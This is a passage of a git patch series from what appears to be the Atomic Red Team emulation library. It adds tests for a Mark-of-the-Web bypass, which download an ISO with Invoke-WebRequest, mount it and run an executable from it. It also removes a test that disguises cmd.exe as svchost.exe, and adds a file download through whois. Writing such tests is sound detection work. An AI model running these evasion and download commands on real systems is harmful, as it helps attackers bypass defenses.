eID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index ebe5a1aa..6e8aae4b 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -354,6 +354,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt +defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 5d54166f..690fbfdb 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -233,6 +233,7 @@ defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06- defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt +defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index bb1de4c0..bfb8c069 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -622,7 +622,8 @@ - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows] - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) + - Atomic Test #1: Mount ISO image [windows] - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 5b6382dc..e53dfb2f 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -439,7 +439,8 @@ - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows] - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) + - Atomic Test #1: Mount ISO image [windows] - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 558cd917..a8def1e4 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -76,7 +76,7 @@ | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | | | | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | | | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | | | | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | | | | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 2448302b..ee76ea53 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -57,7 +57,7 @@ | | | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | | | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | | | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | | | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 6715564c..f0f057a6 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -27216,7 +27216,42 @@ defense-evasion: x_mitre_version: '1.0' x_mitre_defense_bypassed: - Anti-virus, Application control - atomic_tests: [] + identifier: T1553.005 + atomic_tests: + - name: Mount ISO image + auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa + description: 'Mounts ISO image downloaded from internet to evade Mark-of-the-Web. + Upon successful execution, powershell will download the .iso from the Atomic + Red Team repo, and mount the image. The provided sample ISO simply has a Reports + shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ + +' + supported_platforms: + - windows + input_arguments: + path_of_iso: + description: Path to ISO file + type: path + default: PathToAtomicsFolder\T1553.005\src\T1553.005.iso + dependency_executor_name: powershell + dependencies: + - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) + +' + prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" + executor: + command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" + +' + cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" + +' + name: powershell T1036.004: technique: external_references: diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md index 50d47c77..c7f2e10e 100644 --- a/atomics/T1553.005/T1553.005.md +++ b/atomics/T1553.005/T1553.005.md @@ -1,10 +1,12 @@ -# T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass -## [Description from ATT&CK](https://attack.mitre.org/techniques/T1553/005/) -
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
+# T1553.005 - Mark-of-the-Web Bypass +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1553/005) +
Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020) + +Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)
## Atomic Tests -- [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image---) +- [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image)
@@ -26,21 +28,25 @@ Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon success #### Attack Commands: Run with `powershell`! -``` Mount-DiskImage -ImagePath "#{path_of_iso}"``` +```powershell +Mount-DiskImage -ImagePath "#{path_of_iso}" +``` #### Cleanup Commands: -``` Dismount-DiskImage -ImagePath "#{path_of_iso}"``` +```powershell +Dismount-DiskImage -ImagePath "#{path_of_iso}" +``` #### Dependencies: Run with `powershell`! ##### Description: T1553.005.iso must exist on disk at specified location (#{path_of_iso}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" ``` From 09c413e64a57c8ab2ed7eb77bee60ab7e2b9b2ad Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Wed, 9 Jun 2021 13:25:13 -0600 Subject: [PATCH 18/84] removed windows test from t1036.005 --- atomics/T1036.005/T1036.005.yaml | 22 ---------------------- 1 file changed, 22 deletions(-) diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml index 05a1bdd7..4c81dd2d 100644 --- a/atomics/T1036.005/T1036.005.yaml +++ b/atomics/T1036.005/T1036.005.yaml @@ -27,25 +27,3 @@ atomic_tests: cleanup_command: | rm -f $HOME/.../sh rmdir $HOME/.../ - -- name: Execute a process masquerading as a legitimate Windows binary - description: | - Create and execute a process masquerading as a legitimate Windows binary - - supported_platforms: - - windows - - input_arguments: - test_message: - description: Test message to echo out to the screen - type: String - default: Hello from the Atomic Red Team test T1036.005#2 - - executor: - name: command_prompt - elevation_required: false - command: | - copy %WINDIR%\System32\cmd.exe /Y %PUBLIC%\svchost.exe - start %PUBLIC%\svchost.exe /C echo "#{test_message}" - cleanup_command: | - del %PUBLIC%\svchost.exe >nul 2>&1 From 1a3c693394c3088e518252c48eb87188f25c8052 Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Wed, 9 Jun 2021 13:28:07 -0600 Subject: [PATCH 19/84] added 'whois file download' test to T1005 --- atomics/T1105/T1105.yaml | 47 +++++++++++++++++++++++++++++++++++++++- 1 file changed, 46 insertions(+), 1 deletion(-) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 8a7c65e2..b35c9434 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -304,7 +304,7 @@ atomic_tests: Uses the Windows Defender to download a file from the internet (must have version 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory. - + More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ supported_platforms: - windows @@ -335,3 +335,48 @@ atomic_tests: del #{local_path} >nul 2>&1 del %temp%\MpCmdRun.log >nul 2>&1 name: command_prompt +- name: whois file download + description: | + Download a remote file using the whois utility + + supported_platforms: + - linux + - macos + + input_arguments: + remote_host: + description: Remote hostname or IP address + type: String + default: localhost + remote_port: + description: Remote port to connect to + type: Integer + default: 8443 + output_file: + description: Path of file to save output to + type: Path + default: /tmp/T1105.whois.out + query: + description: Query to send to remote server + type: String + default: "Hello from Atomic Red Team test T1105" + timeout: + description: Timeout period before ending process (seconds) + type: Integer + default: 1 + + dependencies: + - description: | + The whois and timeout commands must be present + prereq_command: | + which whois && which timeout + get_prereq_command: | + echo "Please install timeout and the whois package" + + executor: + name: sh + elevation_required: false + command: | + timeout #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} + cleanup_command: | + rm -f #{output_file} From b7eee5a06d65a8c998d438a1a277c08ec44b03df Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Wed, 9 Jun 2021 16:02:14 -0600 Subject: [PATCH 20/84] preserving exit code if whois ends early --- atomics/T1105/T1105.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index b35c9434..9ce67778 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -377,6 +377,6 @@ atomic_tests: name: sh elevation_required: false command: | - timeout #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} + timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} cleanup_command: | rm -f #{output_file} From e70987c4391cb9818fafb6f0fa53b9feda24f40e Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Wed, 9 Jun 2021 22:44:21 -0500 Subject: [PATCH 21/84] T1553.005 (#1509) Co-authored-by: Toua Lor --- atomics/T1553.005/T1553.005.yaml | 36 +++++++++++++++++-- atomics/T1553.005/bin/FeelTheBurn.iso | Bin 0 -> 1179648 bytes atomics/T1553.005/{src => bin}/T1553.005.iso | Bin 3 files changed, 33 insertions(+), 3 deletions(-) create mode 100644 atomics/T1553.005/bin/FeelTheBurn.iso rename atomics/T1553.005/{src => bin}/T1553.005.iso (100%) diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml index 000674c5..63f1ffe5 100644 --- a/atomics/T1553.005/T1553.005.yaml +++ b/atomics/T1553.005/T1553.005.yaml @@ -11,7 +11,7 @@ atomic_tests: path_of_iso: description: Path to ISO file type: path - default: PathToAtomicsFolder\T1553.005\src\T1553.005.iso + default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso dependency_executor_name: powershell dependencies: - description: | @@ -20,11 +20,41 @@ atomic_tests: if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null - Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: | Mount-DiskImage -ImagePath "#{path_of_iso}" cleanup_command: | - Dismount-DiskImage -ImagePath "#{path_of_iso}" + Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null name: powershell +- name: Mount an ISO image and run executable from the ISO + description: |- + Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. + Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". + ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, + supported_platforms: + - windows + input_arguments: + path_of_iso: + description: Path to ISO file + type: path + default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso + dependency_executor_name: powershell + dependencies: + - description: | + FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) + prereq_command: | + if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" + executor: + command: | + $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly + $driveLetter = ($keep | Get-Volume).DriveLetter + invoke-item "$($driveLetter):\hello.exe" + cleanup_command: | + Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null + Stop-process -name "hello" -Force -ErrorAction ignore + name: powershell \ No newline at end of file diff --git a/atomics/T1553.005/bin/FeelTheBurn.iso b/atomics/T1553.005/bin/FeelTheBurn.iso new file mode 100644 index 0000000000000000000000000000000000000000..491da79f9c138c767fe4bc93daa6746dda18a040 GIT binary patch literal 1179648 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 